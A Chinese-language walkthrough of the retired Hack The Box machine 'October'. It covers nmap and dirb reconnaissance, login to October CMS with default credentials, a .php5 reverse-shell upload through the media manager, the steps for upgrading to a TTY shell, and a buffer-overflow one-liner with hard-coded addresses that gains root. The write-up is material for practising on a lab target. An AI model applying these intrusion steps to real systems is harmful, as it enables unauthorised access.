HTB-靶机-October

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.16

nmap -sV -sC -p- -T5 -oN october.nmap 10.10.10.16

nmap扫描结果

只有两个端口，访问web应用看看

点了上面的功能按钮，没发现什么有价值的信息，使用dirb命令跑下目录

试了下上面发现的目录都测试了下，发现uri地址backend访问是个登录界面，并且上面显示是october cms程序，谷歌搜索了下，是默认账号密码admin/admin能够正常登录进去

进去之后上面的功能都点击了一把，发现 http://10.10.10.16/backend/cms/media 可以直接上传文件，经过测试我直接上传php后缀文件显示失败，然后看到目标靶机的上已经有了一个php5后缀的文件

那么直接上传个php5格式的反弹shell代码，结果成功了， 并成功反弹shell (october cms exploit : https://www.exploit-db.com/exploits/41936)

这次我就是使用非python环境升级成tty-shell ，具体步骤如下

非 python环境tty-shell
script /dev/null -c bash
在键盘上按住Ctrl+Z
stty raw -echo
fg
reset
会让你输入类型，输入：xterm
echo $TERM（查看类型，可以不执行）
export TERM=xterm
export SHELL=bash
stty rows 54 columns 104  (得到这个是在本地kali执行 stty -a所获得)

最终获得了tty-shell，使用提权枚举脚本https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh 获取到本靶机是需要通过缓冲区溢出的方式进行提权，具体提权代码如下：

while true; do ./ovrflw $(python -c 'print "A"*112 + "\x10\x13\x5e\xb7\x60\x42\x5d\xb7\xac\x3b\x70\xb7"');done